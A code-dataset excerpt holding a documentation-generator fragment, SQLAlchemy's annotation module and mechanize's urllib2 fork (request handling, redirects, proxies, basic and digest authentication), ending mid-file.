params = [FUNC_PARAMETERS_ITEM_FORMAT.format(
name = param.name,
description = param.get_xml_description()) for param in sig.properties]
params = FUNC_PARAMETERS_FORMAT.format(param_items = '\n'.join(params))
signals.append(SIGNAL_ITEM_FORMAT.format(
prefix = obj.prefix,
name = sig.name,
description = sig.get_xml_description(),
inline_params = inline_params,
params = params))
return SIGNALS_FORMAT.format(
prefix = obj.prefix,
signals = "\n".join(signals))
def get_properties(obj):
if len(obj.properties) == 0:
return ""
properties = [PROPERTIES_ITEM_FORMAT.format(
prefix = obj.prefix,
name = prop.name,
disp_name = ('“' + prop.name + '”').ljust(25),
type_link = get_type_link(prop.arg_type, obj.file),
type_name = prop.arg_type,
description = prop.get_xml_description()) for prop in obj.properties]
return PROPERTIES_FORMAT.format(
prefix = obj.prefix,
properties = "\n".join(properties))
def get_enums(obj):
if len(obj.enums) == 0:
return ""
enums = []
for enum in obj.enums:
items = [ENUMS_ITEM_ROW_FORMAT.format(
name = item.name,
description = item.get_xml_description()) for item in enum.properties]
enums.append(ENUMS_ITEM_FORMAT.format(
prefix = enum.prefix,
name = enum.name,
description = enum.get_xml_description(),
enum_items = "\n".join(items)))
return ENUMS_FORMAT.format(
prefix = obj.prefix,
enums = "\n".join(enums))
| gpl-2.0 |
Maximilian-Reuter/SickRage | lib/sqlalchemy/sql/annotation.py | 79 | 6143 | # sql/annotation.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""The :class:`.Annotated` class and related routines; creates hash-equivalent
copies of SQL constructs which contain context-specific markers and associations.
"""
from .. import util
from . import operators
class Annotated(object):
"""clones a ClauseElement and applies an 'annotations' dictionary.
Unlike regular clones, this clone also mimics __hash__() and
__cmp__() of the original element so that it takes its place
in hashed collections.
A reference to the original element is maintained, for the important
reason of keeping its hash value current. When GC'ed, the
hash value may be reused, causing conflicts.
"""
def __new__(cls, *args):
if not args:
# clone constructor
return object.__new__(cls)
else:
element, values = args
# pull appropriate subclass from registry of annotated
# classes
try:
cls = annotated_classes[element.__class__]
except KeyError:
cls = _new_annotation_type(element.__class__, cls)
return object.__new__(cls)
def __init__(self, element, values):
self.__dict__ = element.__dict__.copy()
self.__element = element
self._annotations = values
def _annotate(self, values):
_values = self._annotations.copy()
_values.update(values)
return self._with_annotations(_values)
def _with_annotations(self, values):
clone = self.__class__.__new__(self.__class__)
clone.__dict__ = self.__dict__.copy()
clone._annotations = values
return clone
def _deannotate(self, values=None, clone=True):
if values is None:
return self.__element
else:
_values = self._annotations.copy()
for v in values:
_values.pop(v, None)
return self._with_annotations(_values)
def _compiler_dispatch(self, visitor, **kw):
return self.__element.__class__._compiler_dispatch(self, visitor, **kw)
@property
def _constructor(self):
return self.__element._constructor
def _clone(self):
clone = self.__element._clone()
if clone is self.__element:
# detect immutable, don't change anything
return self
else:
# update the clone with any changes that have occurred
# to this object's __dict__.
clone.__dict__.update(self.__dict__)
return self.__class__(clone, self._annotations)
def __hash__(self):
return hash(self.__element)
def __eq__(self, other):
if isinstance(self.__element, operators.ColumnOperators):
return self.__element.__class__.__eq__(self, other)
else:
return hash(other) == hash(self)
# hard-generate Annotated subclasses. this technique
# is used instead of on-the-fly types (i.e. type.__new__())
# so that the resulting objects are pickleable.
annotated_classes = {}
def _deep_annotate(element, annotations, exclude=None):
"""Deep copy the given ClauseElement, annotating each element
with the given annotations dictionary.
Elements within the exclude collection will be cloned but not annotated.
"""
def clone(elem):
if exclude and \
hasattr(elem, 'proxy_set') and \
elem.proxy_set.intersection(exclude):
newelem = elem._clone()
elif annotations != elem._annotations:
newelem = elem._annotate(annotations)
else:
newelem = elem
newelem._copy_internals(clone=clone)
return newelem
if element is not None:
element = clone(element)
return element
def _deep_deannotate(element, values=None):
"""Deep copy the given element, removing annotations."""
cloned = util.column_dict()
def clone(elem):
# if a values dict is given,
# the elem must be cloned each time it appears,
# as there may be different annotations in source
# elements that are remaining. if totally
# removing all annotations, can assume the same
# slate...
if values or elem not in cloned:
newelem = elem._deannotate(values=values, clone=True)
newelem._copy_internals(clone=clone)
if not values:
cloned[elem] = newelem
return newelem
else:
return cloned[elem]
if element is not None:
element = clone(element)
return element
def _shallow_annotate(element, annotations):
"""Annotate the given ClauseElement and copy its internals so that
internal objects refer to the new annotated object.
Basically used to apply a "dont traverse" annotation to a
selectable, without digging throughout the whole
structure wasting time.
"""
element = element._annotate(annotations)
element._copy_internals()
return element
def _new_annotation_type(cls, base_cls):
if issubclass(cls, Annotated):
return cls
elif cls in annotated_classes:
return annotated_classes[cls]
for super_ in cls.__mro__:
# check if an Annotated subclass more specific than
# the given base_cls is already registered, such
# as AnnotatedColumnElement.
if super_ in annotated_classes:
base_cls = annotated_classes[super_]
break
annotated_classes[cls] = anno_cls = type(
"Annotated%s" % cls.__name__,
(base_cls, cls), {})
globals()["Annotated%s" % cls.__name__] = anno_cls
return anno_cls
def _prepare_annotations(target_hierarchy, base_cls):
stack = [target_hierarchy]
while stack:
cls = stack.pop()
stack.extend(cls.__subclasses__())
_new_annotation_type(cls, base_cls)
| gpl-3.0 |
campbe13/openhatch | vendor/packages/mechanize/mechanize/_urllib2_fork.py | 130 | 49067 | """Fork of urllib2.
When reading this, don't assume that all code in here is reachable. Code in
the rest of mechanize may be used instead.
Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009 Python
Software Foundation; All Rights Reserved
Copyright 2002-2009 John J Lee <jjl@pobox.com>
This code is free software; you can redistribute it and/or modify it
under the terms of the BSD or ZPL 2.1 licenses (see the file
COPYING.txt included with the distribution).
"""
# XXX issues:
# If an authentication error handler that tries to perform
# authentication for some reason but fails, how should the error be
# signalled? The client needs to know the HTTP error code. But if
# the handler knows that the problem was, e.g., that it didn't know
# that hash algo that requested in the challenge, it would be good to
# pass that information along to the client, too.
# ftp errors aren't handled cleanly
# check digest against correct (i.e. non-apache) implementation
# Possible extensions:
# complex proxies XXX not sure what exactly was meant by this
# abstract factory for opener
import copy
import base64
import httplib
import mimetools
import logging
import os
import posixpath
import random
import re
import socket
import sys
import time
import urllib
import urlparse
import bisect
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
try:
import hashlib
except ImportError:
# python 2.4
import md5
import sha
def sha1_digest(bytes):
return sha.new(bytes).hexdigest()
def md5_digest(bytes):
return md5.new(bytes).hexdigest()
else:
def sha1_digest(bytes):
return hashlib.sha1(bytes).hexdigest()
def md5_digest(bytes):
return hashlib.md5(bytes).hexdigest()
try:
socket._fileobject("fake socket", close=True)
except TypeError:
# python <= 2.4
create_readline_wrapper = socket._fileobject
else:
def create_readline_wrapper(fh):
return socket._fileobject(fh, close=True)
# python 2.4 splithost has a bug in empty path component case
_hostprog = None
def splithost(url):
"""splithost('//host[:port]/path') --> 'host[:port]', '/path'."""
global _hostprog
if _hostprog is None:
import re
_hostprog = re.compile('^//([^/?]*)(.*)$')
match = _hostprog.match(url)
if match: return match.group(1, 2)
return None, url
from urllib import (unwrap, unquote, splittype, quote,
addinfourl, splitport,
splitattr, ftpwrapper, splituser, splitpasswd, splitvalue)
# support for FileHandler, proxies via environment variables
from urllib import localhost, url2pathname, getproxies
from urllib2 import HTTPError, URLError
import _request
import _rfc3986
import _sockettimeout
from _clientcookie import CookieJar
from _response import closeable_response
# used in User-Agent header sent
__version__ = sys.version[:3]
_opener = None
def urlopen(url, data=None, timeout=_sockettimeout._GLOBAL_DEFAULT_TIMEOUT):
global _opener
if _opener is None:
_opener = build_opener()
return _opener.open(url, data, timeout)
def install_opener(opener):
global _opener
_opener = opener
# copied from cookielib.py
_cut_port_re = re.compile(r":\d+$")
def request_host(request):
"""Return request-host, as defined by RFC 2965.
Variation from RFC: returned value is lowercased, for convenient
comparison.
"""
url = request.get_full_url()
host = urlparse.urlparse(url)[1]
if host == "":
host = request.get_header("Host", "")
# remove port, if present
host = _cut_port_re.sub("", host, 1)
return host.lower()
class Request:
def __init__(self, url, data=None, headers={},
origin_req_host=None, unverifiable=False):
# unwrap('<URL:type://host/path>') --> 'type://host/path'
self.__original = unwrap(url)
self.type = None
# self.__r_type is what's left after doing the splittype
self.host = None
self.port = None
self._tunnel_host = None
self.data = data
self.headers = {}
for key, value in headers.items():
self.add_header(key, value)
self.unredirected_hdrs = {}
if origin_req_host is None:
origin_req_host = request_host(self)
self.origin_req_host = origin_req_host
self.unverifiable = unverifiable
def __getattr__(self, attr):
# XXX this is a fallback mechanism to guard against these
# methods getting called in a non-standard order. this may be
# too complicated and/or unnecessary.
# XXX should the __r_XXX attributes be public?
if attr[:12] == '_Request__r_':
name = attr[12:]
if hasattr(Request, 'get_' + name):
getattr(self, 'get_' + name)()
return getattr(self, attr)
raise AttributeError, attr
def get_method(self):
if self.has_data():
return "POST"
else:
return "GET"
# XXX these helper methods are lame
def add_data(self, data):
self.data = data
def has_data(self):
return self.data is not None
def get_data(self):
return self.data
def get_full_url(self):
return self.__original
def get_type(self):
if self.type is None:
self.type, self.__r_type = splittype(self.__original)
if self.type is None:
raise ValueError, "unknown url type: %s" % self.__original
return self.type
def get_host(self):
if self.host is None:
self.host, self.__r_host = splithost(self.__r_type)
if self.host:
self.host = unquote(self.host)
return self.host
def get_selector(self):
scheme, authority, path, query, fragment = _rfc3986.urlsplit(
self.__r_host)
if path == "":
path = "/" # RFC 2616, section 3.2.2
fragment = None # RFC 3986, section 3.5
return _rfc3986.urlunsplit([scheme, authority, path, query, fragment])
def set_proxy(self, host, type):
orig_host = self.get_host()
if self.get_type() == 'https' and not self._tunnel_host:
self._tunnel_host = orig_host
else:
self.type = type
self.__r_host = self.__original
self.host = host
def has_proxy(self):
"""Private method."""
# has non-HTTPS proxy
return self.__r_host == self.__original
def get_origin_req_host(self):
return self.origin_req_host
def is_unverifiable(self):
return self.unverifiable
def add_header(self, key, val):
# useful for something like authentication
self.headers[key.capitalize()] = val
def add_unredirected_header(self, key, val):
# will not be added to a redirected request
self.unredirected_hdrs[key.capitalize()] = val
def has_header(self, header_name):
return (header_name in self.headers or
header_name in self.unredirected_hdrs)
def get_header(self, header_name, default=None):
return self.headers.get(
header_name,
self.unredirected_hdrs.get(header_name, default))
def header_items(self):
hdrs = self.unredirected_hdrs.copy()
hdrs.update(self.headers)
return hdrs.items()
class OpenerDirector:
def __init__(self):
client_version = "Python-urllib/%s" % __version__
self.addheaders = [('User-agent', client_version)]
# manage the individual handlers
self.handlers = []
self.handle_open = {}
self.handle_error = {}
self.process_response = {}
self.process_request = {}
def add_handler(self, handler):
if not hasattr(handler, "add_parent"):
raise TypeError("expected BaseHandler instance, got %r" %
type(handler))
added = False
for meth in dir(handler):
if meth in ["redirect_request", "do_open", "proxy_open"]:
# oops, coincidental match
continue
i = meth.find("_")
protocol = meth[:i]
condition = meth[i+1:]
if condition.startswith("error"):
j = condition.find("_") + i + 1
kind = meth[j+1:]
try:
kind = int(kind)
except ValueError:
pass
lookup = self.handle_error.get(protocol, {})
self.handle_error[protocol] = lookup
elif condition == "open":
kind = protocol
lookup = self.handle_open
elif condition == "response":
kind = protocol
lookup = self.process_response
elif condition == "request":
kind = protocol
lookup = self.process_request
else:
continue
handlers = lookup.setdefault(kind, [])
if handlers:
bisect.insort(handlers, handler)
else:
handlers.append(handler)
added = True
if added:
# the handlers must work in an specific order, the order
# is specified in a Handler attribute
bisect.insort(self.handlers, handler)
handler.add_parent(self)
def close(self):
# Only exists for backwards compatibility.
pass
def _call_chain(self, chain, kind, meth_name, *args):
# Handlers raise an exception if no one else should try to handle
# the request, or return None if they can't but another handler
# could. Otherwise, they return the response.
handlers = chain.get(kind, ())
for handler in handlers:
func = getattr(handler, meth_name)
result = func(*args)
if result is not None:
return result
def _open(self, req, data=None):
result = self._call_chain(self.handle_open, 'default',
'default_open', req)
if result:
return result
protocol = req.get_type()
result = self._call_chain(self.handle_open, protocol, protocol +
'_open', req)
if result:
return result
return self._call_chain(self.handle_open, 'unknown',
'unknown_open', req)
def error(self, proto, *args):
if proto in ('http', 'https'):
# XXX http[s] protocols are special-cased
dict = self.handle_error['http'] # https is not different than http
proto = args[2] # YUCK!
meth_name = 'http_error_%s' % proto
http_err = 1
orig_args = args
else:
dict = self.handle_error
meth_name = proto + '_error'
http_err = 0
args = (dict, proto, meth_name) + args
result = self._call_chain(*args)
if result:
return result
if http_err:
args = (dict, 'default', 'http_error_default') + orig_args
return self._call_chain(*args)
# XXX probably also want an abstract factory that knows when it makes
# sense to skip a superclass in favor of a subclass and when it might
# make sense to include both
def build_opener(*handlers):
"""Create an opener object from a list of handlers.
The opener will use several default handlers, including support
for HTTP, FTP and when applicable, HTTPS.
If any of the handlers passed as arguments are subclasses of the
default handlers, the default handlers will not be used.
"""
import types
def isclass(obj):
return isinstance(obj, (types.ClassType, type))
opener = OpenerDirector()
default_classes = [ProxyHandler, UnknownHandler, HTTPHandler,
HTTPDefaultErrorHandler, HTTPRedirectHandler,
FTPHandler, FileHandler, HTTPErrorProcessor]
if hasattr(httplib, 'HTTPS'):
default_classes.append(HTTPSHandler)
skip = set()
for klass in default_classes:
for check in handlers:
if isclass(check):
if issubclass(check, klass):
skip.add(klass)
elif isinstance(check, klass):
skip.add(klass)
for klass in skip:
default_classes.remove(klass)
for klass in default_classes:
opener.add_handler(klass())
for h in handlers:
if isclass(h):
h = h()
opener.add_handler(h)
return opener
class BaseHandler:
handler_order = 500
def add_parent(self, parent):
self.parent = parent
def close(self):
# Only exists for backwards compatibility
pass
def __lt__(self, other):
if not hasattr(other, "handler_order"):
# Try to preserve the old behavior of having custom classes
# inserted after default ones (works only for custom user
# classes which are not aware of handler_order).
return True
return self.handler_order < other.handler_order
class HTTPErrorProcessor(BaseHandler):
"""Process HTTP error responses.
The purpose of this handler is to to allow other response processors a
look-in by removing the call to parent.error() from
AbstractHTTPHandler.
For non-2xx error codes, this just passes the job on to the
Handler.<proto>_error_<code> methods, via the OpenerDirector.error method.
Eventually, HTTPDefaultErrorHandler will raise an HTTPError if no other
handler handles the error.
"""
handler_order = 1000 # after all other processors
def http_response(self, request, response):
code, msg, hdrs = response.code, response.msg, response.info()
# According to RFC 2616, "2xx" code indicates that the client's
# request was successfully received, understood, and accepted.
if not (200 <= code < 300):
# hardcoded http is NOT a bug
response = self.parent.error(
'http', request, response, code, msg, hdrs)
return response
https_response = http_response
class HTTPDefaultErrorHandler(BaseHandler):
def http_error_default(self, req, fp, code, msg, hdrs):
# why these error methods took the code, msg, headers args in the first
# place rather than a response object, I don't know, but to avoid
# multiple wrapping, we're discarding them
if isinstance(fp, HTTPError):
response = fp
else:
response = HTTPError(
req.get_full_url(), code, msg, hdrs, fp)
assert code == response.code
assert msg == response.msg
assert hdrs == response.hdrs
raise response
class HTTPRedirectHandler(BaseHandler):
# maximum number of redirections to any single URL
# this is needed because of the state that cookies introduce
max_repeats = 4
# maximum total number of redirections (regardless of URL) before
# assuming we're in a loop
max_redirections = 10
# Implementation notes:
# To avoid the server sending us into an infinite loop, the request
# object needs to track what URLs we have already seen. Do this by
# adding a handler-specific attribute to the Request object. The value
# of the dict is used to count the number of times the same URL has
# been visited. This is needed because visiting the same URL twice
# does not necessarily imply a loop, thanks to state introduced by
# cookies.
# Always unhandled redirection codes:
# 300 Multiple Choices: should not handle this here.
# 304 Not Modified: no need to handle here: only of interest to caches
# that do conditional GETs
# 305 Use Proxy: probably not worth dealing with here
# 306 Unused: what was this for in the previous versions of protocol??
def redirect_request(self, req, fp, code, msg, headers, newurl):
"""Return a Request or None in response to a redirect.
This is called by the http_error_30x methods when a
redirection response is received. If a redirection should
take place, return a new Request to allow http_error_30x to
perform the redirect. Otherwise, raise HTTPError if no-one
else should try to handle this url. Return None if you can't
but another Handler might.
"""
m = req.get_method()
if (code in (301, 302, 303, 307, "refresh") and m in ("GET", "HEAD")
or code in (301, 302, 303, "refresh") and m == "POST"):
# Strictly (according to RFC 2616), 301 or 302 in response
# to a POST MUST NOT cause a redirection without confirmation
# from the user (of urllib2, in this case). In practice,
# essentially all clients do redirect in this case, so we do
# the same.
# TODO: really refresh redirections should be visiting; tricky to fix
new = _request.Request(
newurl,
headers=req.headers,
origin_req_host=req.get_origin_req_host(),
unverifiable=True,
visit=False,
timeout=req.timeout)
new._origin_req = getattr(req, "_origin_req", req)
return new
else:
raise HTTPError(req.get_full_url(), code, msg, headers, fp)
def http_error_302(self, req, fp, code, msg, headers):
# Some servers (incorrectly) return multiple Location headers
# (so probably same goes for URI). Use first header.
if 'location' in headers:
newurl = headers.getheaders('location')[0]
elif 'uri' in headers:
newurl = headers.getheaders('uri')[0]
else:
return
newurl = _rfc3986.clean_url(newurl, "latin-1")
newurl = _rfc3986.urljoin(req.get_full_url(), newurl)
# XXX Probably want to forget about the state of the current
# request, although that might interact poorly with other
# handlers that also use handler-specific request attributes
new = self.redirect_request(req, fp, code, msg, headers, newurl)
if new is None:
return
# loop detection
# .redirect_dict has a key url if url was previously visited.
if hasattr(req, 'redirect_dict'):
visited = new.redirect_dict = req.redirect_dict
if (visited.get(newurl, 0) >= self.max_repeats or
len(visited) >= self.max_redirections):
raise HTTPError(req.get_full_url(), code,
self.inf_msg + msg, headers, fp)
else:
visited = new.redirect_dict = req.redirect_dict = {}
visited[newurl] = visited.get(newurl, 0) + 1
# Don't close the fp until we are sure that we won't use it
# with HTTPError.
fp.read()
fp.close()
return self.parent.open(new)
http_error_301 = http_error_303 = http_error_307 = http_error_302
http_error_refresh = http_error_302
inf_msg = "The HTTP server returned a redirect error that would " \
"lead to an infinite loop.\n" \
"The last 30x error message was:\n"
def _parse_proxy(proxy):
"""Return (scheme, user, password, host/port) given a URL or an authority.
If a URL is supplied, it must have an authority (host:port) component.
According to RFC 3986, having an authority component means the URL must
have two slashes after the scheme:
>>> _parse_proxy('file:/ftp.example.com/')
Traceback (most recent call last):
ValueError: proxy URL with no authority: 'file:/ftp.example.com/'
The first three items of the returned tuple may be None.
Examples of authority parsing:
>>> _parse_proxy('proxy.example.com')
(None, None, None, 'proxy.example.com')
>>> _parse_proxy('proxy.example.com:3128')
(None, None, None, 'proxy.example.com:3128')
The authority component may optionally include userinfo (assumed to be
username:password):
>>> _parse_proxy('joe:password@proxy.example.com')
(None, 'joe', 'password', 'proxy.example.com')
>>> _parse_proxy('joe:password@proxy.example.com:3128')
(None, 'joe', 'password', 'proxy.example.com:3128')
Same examples, but with URLs instead:
>>> _parse_proxy('http://proxy.example.com/')
('http', None, None, 'proxy.example.com')
>>> _parse_proxy('http://proxy.example.com:3128/')
('http', None, None, 'proxy.example.com:3128')
>>> _parse_proxy('http://joe:password@proxy.example.com/')
('http', 'joe', 'password', 'proxy.example.com')
>>> _parse_proxy('http://joe:password@proxy.example.com:3128')
('http', 'joe', 'password', 'proxy.example.com:3128')
Everything after the authority is ignored:
>>> _parse_proxy('ftp://joe:password@proxy.example.com/rubbish:3128')
('ftp', 'joe', 'password', 'proxy.example.com')
Test for no trailing '/' case:
>>> _parse_proxy('http://joe:password@proxy.example.com')
('http', 'joe', 'password', 'proxy.example.com')
"""
scheme, r_scheme = splittype(proxy)
if not r_scheme.startswith("/"):
# authority
scheme = None
authority = proxy
else:
# URL
if not r_scheme.startswith("//"):
raise ValueError("proxy URL with no authority: %r" % proxy)
# We have an authority, so for RFC 3986-compliant URLs (by ss 3.
# and 3.3.), path is empty or starts with '/'
end = r_scheme.find("/", 2)
if end == -1:
end = None
authority = r_scheme[2:end]
userinfo, hostport = splituser(authority)
if userinfo is not None:
user, password = splitpasswd(userinfo)
else:
user = password = None
return scheme, user, password, hostport
class ProxyHandler(BaseHandler):
# Proxies must be in front
handler_order = 100
def __init__(self, proxies=None, proxy_bypass=None):
if proxies is None:
proxies = getproxies()
assert hasattr(proxies, 'has_key'), "proxies must be a mapping"
self.proxies = proxies
for type, url in proxies.items():
setattr(self, '%s_open' % type,
lambda r, proxy=url, type=type, meth=self.proxy_open: \
meth(r, proxy, type))
if proxy_bypass is None:
proxy_bypass = urllib.proxy_bypass
self._proxy_bypass = proxy_bypass
def proxy_open(self, req, proxy, type):
orig_type = req.get_type()
proxy_type, user, password, hostport = _parse_proxy(proxy)
if proxy_type is None:
proxy_type = orig_type
if req.get_host() and self._proxy_bypass(req.get_host()):
return None
if user and password:
user_pass = '%s:%s' % (unquote(user), unquote(password))
creds = base64.b64encode(user_pass).strip()
req.add_header('Proxy-authorization', 'Basic ' + creds)
hostport = unquote(hostport)
req.set_proxy(hostport, proxy_type)
if orig_type == proxy_type or orig_type == 'https':
# let other handlers take care of it
return None
else:
# need to start over, because the other handlers don't
# grok the proxy's URL type
# e.g. if we have a constructor arg proxies like so:
# {'http': 'ftp://proxy.example.com'}, we may end up turning
# a request for http://acme.example.com/a into one for
# ftp://proxy.example.com/a
return self.parent.open(req)
class HTTPPasswordMgr:
def __init__(self):
self.passwd = {}
def add_password(self, realm, uri, user, passwd):
# uri could be a single URI or a sequence
if isinstance(uri, basestring):
uri = [uri]
if not realm in self.passwd:
self.passwd[realm] = {}
for default_port in True, False:
reduced_uri = tuple(
[self.reduce_uri(u, default_port) for u in uri])
self.passwd[realm][reduced_uri] = (user, passwd)
def find_user_password(self, realm, authuri):
domains = self.passwd.get(realm, {})
for default_port in True, False:
reduced_authuri = self.reduce_uri(authuri, default_port)
for uris, authinfo in domains.iteritems():
for uri in uris:
if self.is_suburi(uri, reduced_authuri):
return authinfo
return None, None
def reduce_uri(self, uri, default_port=True):
"""Accept authority or URI and extract only the authority and path."""
# note HTTP URLs do not have a userinfo component
parts = urlparse.urlsplit(uri)
if parts[1]:
# URI
scheme = parts[0]
authority = parts[1]
path = parts[2] or '/'
else:
# host or host:port
scheme = None
authority = uri
path = '/'
host, port = splitport(authority)
if default_port and port is None and scheme is not None:
dport = {"http": 80,
"https": 443,
}.get(scheme)
if dport is not None:
authority = "%s:%d" % (host, dport)
return authority, path
def is_suburi(self, base, test):
"""Check if test is below base in a URI tree
Both args must be URIs in reduced form.
"""
if base == test:
return True
if base[0] != test[0]:
return False
common = posixpath.commonprefix((base[1], test[1]))
if len(common) == len(base[1]):
return True
return False
class HTTPPasswordMgrWithDefaultRealm(HTTPPasswordMgr):
def find_user_password(self, realm, authuri):
user, password = HTTPPasswordMgr.find_user_password(self, realm,
authuri)
if user is not None:
return user, password
return HTTPPasswordMgr.find_user_password(self, None, authuri)
class AbstractBasicAuthHandler:
# XXX this allows for multiple auth-schemes, but will stupidly pick
# the last one with a realm specified.
# allow for double- and single-quoted realm values
# (single quotes are a violation of the RFC, but appear in the wild)
rx = re.compile('(?:.*,)*[ \t]*([^ \t]+)[ \t]+'
'realm=(["\'])(.*?)\\2', re.I)
# XXX could pre-emptively send auth info already accepted (RFC 2617,
# end of section 2, and section 1.2 immediately after "credentials"
# production).
def __init__(self, password_mgr=None):
if password_mgr is None:
password_mgr = HTTPPasswordMgr()
self.passwd = password_mgr
self.add_password = self.passwd.add_password
def http_error_auth_reqed(self, authreq, host, req, headers):
# host may be an authority (without userinfo) or a URL with an
# authority
# XXX could be multiple headers
authreq = headers.get(authreq, None)
if authreq:
mo = AbstractBasicAuthHandler.rx.search(authreq)
if mo:
scheme, quote, realm = mo.groups()
if scheme.lower() == 'basic':
return self.retry_http_basic_auth(host, req, realm)
def retry_http_basic_auth(self, host, req, realm):
user, pw = self.passwd.find_user_password(realm, host)
if pw is not None:
raw = "%s:%s" % (user, pw)
auth = 'Basic %s' % base64.b64encode(raw).strip()
if req.headers.get(self.auth_header, None) == auth:
return None
newreq = copy.copy(req)
newreq.add_header(self.auth_header, auth)
newreq.visit = False
return self.parent.open(newreq)
else:
return None
class HTTPBasicAuthHandler(AbstractBasicAuthHandler, BaseHandler):
auth_header = 'Authorization'
def http_error_401(self, req, fp, code, msg, headers):
url = req.get_full_url()
return self.http_error_auth_reqed('www-authenticate',
url, req, headers)
class ProxyBasicAuthHandler(AbstractBasicAuthHandler, BaseHandler):
auth_header = 'Proxy-authorization'
def http_error_407(self, req, fp, code, msg, headers):
# http_error_auth_reqed requires that there is no userinfo component in
# authority. Assume there isn't one, since urllib2 does not (and
# should not, RFC 3986 s. 3.2.1) support requests for URLs containing
# userinfo.
authority = req.get_host()
return self.http_error_auth_reqed('proxy-authenticate',
authority, req, headers)
def randombytes(n):
"""Return n random bytes."""
# Use /dev/urandom if it is available. Fall back to random module
# if not. It might be worthwhile to extend this function to use
# other platform-specific mechanisms for getting random bytes.
if os.path.exists("/dev/urandom"):
f = open("/dev/urandom")
s = f.read(n)
f.close()
return s
else:
L = [chr(random.randrange(0, 256)) for i in range(n)]
return "".join(L)
class AbstractDigestAuthHandler:
# Digest authentication is specified in RFC 2617.
# XXX The client does not inspect the Authentication-Info header
# in a successful response.
# XXX It should be possible to test this implementation against
# a mock server that just generates a static set of challenges.
# XXX qop="auth-int" supports is shaky
def __init__(self, passwd=None):
if passwd is None:
passwd = HTTPPasswordMgr()
self.passwd = passwd
self.add_password = self.passwd.add_password
self.retried = 0
self.nonce_count = 0
self.last_nonce = None
def reset_retry_count(self):
self.retried = 0
def http_error_auth_reqed(self, auth_header, host, req, headers):
authreq = headers.get(auth_header, None)
if self.retried > 5:
# Don't fail endlessly - if we failed once, we'll probably
# fail a second time. Hm. Unless the Password Manager is
# prompting for the information. Crap. This isn't great
# but it's better than the current 'repeat until recursion
# depth exceeded' approach <wink>
raise HTTPError(req.get_full_url(), 401, "digest auth failed",
headers, None)
else:
self.retried += 1
if authreq:
scheme = authreq.split()[0]
if scheme.lower() == 'digest':
return self.retry_http_digest_auth(req, authreq)
def retry_http_digest_auth(self, req, auth):
token, challenge = auth.split(' ', 1)
chal = parse_keqv_list(parse_http_list(challenge))
auth = self.get_authorization(req, chal)
if auth:
auth_val = 'Digest %s' % auth
if req.headers.get(self.auth_header, None) == auth_val:
return None
newreq = copy.copy(req)
newreq.add_unredirected_header(self.auth_header, auth_val)
newreq.visit = False
return self.parent.open(newreq)
def get_cnonce(self, nonce):
# The cnonce-value is an opaque
# quoted string value provided by the client and used by both client
# and server to avoid chosen plaintext attacks, to provide mutual
# authentication, and to provide some message integrity protection.
# This isn't a fabulous effort, but it's probably Good Enough.
dig = sha1_digest("%s:%s:%s:%s" % (self.nonce_count, nonce,
time.ctime(), randombytes(8)))
return dig[:16]
def get_authorization(self, req, chal):
try:
realm = chal['realm']
nonce = chal['nonce']
qop = chal.get('qop')
algorithm = chal.get('algorithm', 'MD5')
# mod_digest doesn't send an opaque, even though it isn't
# supposed to be optional
opaque = chal.get('opaque', None)
except KeyError:
return None
H, KD = self.get_algorithm_impls(algorithm)
if H is None:
return None
user, pw = self.passwd.find_user_password(realm, req.get_full_url())
if user is None:
return None
# XXX not implemented yet
if req.has_data():
entdig = self.get_entity_digest(req.get_data(), chal)
else:
entdig = None
A1 = "%s:%s:%s" % (user, realm, pw)
A2 = "%s:%s" % (req.get_method(),
# XXX selector: what about proxies and full urls
req.get_selector())
if qop == 'auth':
if nonce == self.last_nonce:
self.nonce_count += 1
else:
self.nonce_count = 1
self.last_nonce = nonce
ncvalue = '%08x' % self.nonce_count
cnonce = self.get_cnonce(nonce)
noncebit = "%s:%s:%s:%s:%s" % (nonce, ncvalue, cnonce, qop, H(A2))
respdig = KD(H(A1), noncebit)
elif qop is None:
respdig = KD(H(A1), "%s:%s" % (nonce, H(A2)))
else:
# XXX handle auth-int.
logger = logging.getLogger("mechanize.auth")
logger.info("digest auth auth-int qop is not supported, not "
"handling digest authentication")
return None
# XXX should the partial digests be encoded too?
base = 'username="%s", realm="%s", nonce="%s", uri="%s", ' \
'response="%s"' % (user, realm, nonce, req.get_selector(),
respdig)
if opaque:
base += ', opaque="%s"' % opaque
if entdig:
base += ', digest="%s"' % entdig
base += ', algorithm="%s"' % algorithm
if qop:
base += ', qop=auth, nc=%s, cnonce="%s"' % (ncvalue, cnonce)
return base
def get_algorithm_impls(self, algorithm):
# algorithm should be case-insensitive according to RFC2617
algorithm = algorithm.upper()
if algorithm == 'MD5':
H = md5_digest
elif algorithm == 'SHA':
H = sha1_digest
# XXX MD5-sess
KD = lambda s, d: H("%s:%s" % (s, d))
return H, KD
def get_entity_digest(self, data, chal):
# XXX not implemented yet
return None
class HTTPDigestAuthHandler(BaseHandler, AbstractDigestAuthHandler):
"""An authentication protocol defined by RFC 2069
Digest authentication improves on basic authentication because it
does not transmit passwords in the clear.
"""
auth_header = 'Authorization'
handler_order = 490 # before Basic auth
def http_error_401(self, req, fp, code, msg, headers):
host = urlparse.urlparse(req.get_full_url())[1]
retry = self.http_error_auth_reqed('www-authenticate',
host, req, headers)
self.reset_retry_count()
return retry
class ProxyDigestAuthHandler(BaseHandler, AbstractDigestAuthHandler):
auth_header = 'Proxy-Authorization'
handler_order = 490 # before Basic auth
def http_error_407(self, req, fp, code, msg, headers):
host = req.get_host()
retry = self.http_error_auth_reqed('proxy-authenticate',
host, req, headers)
self.reset_retry_count()
return retry
class AbstractHTTPHandler(BaseHandler):
def __init__(self, debuglevel=0):
self._debuglevel = debuglevel
def set_http_debuglevel(self, level):
self._debuglevel = level
def do_request_(self, request):
host = request.get_host()
if not host:
raise URLError('no host given')
if request.has_data(): # POST
data = request.get_data()
if not request.has_header('Content-type'):
request.add_unredirected_header(
'Content-type',
'application/x-www-form-urlencoded')
if not request.has_header('Content-length'):
request.add_unredirected_header(
'Content-length', '%d' % len(data))
sel_host = host
if request.has_proxy():
scheme, sel = splittype(request.get_selector())
sel_host, sel_path = splithost(sel)
if not request.has_header('Host'):
request.add_unredirected_header('Host', sel_host)
for name, value in self.parent.addheaders:
name = name.capitalize()
if not request.has_header(name):
request.add_unredirected_header(name, value)
return request
def do_open(self, http_class, req):
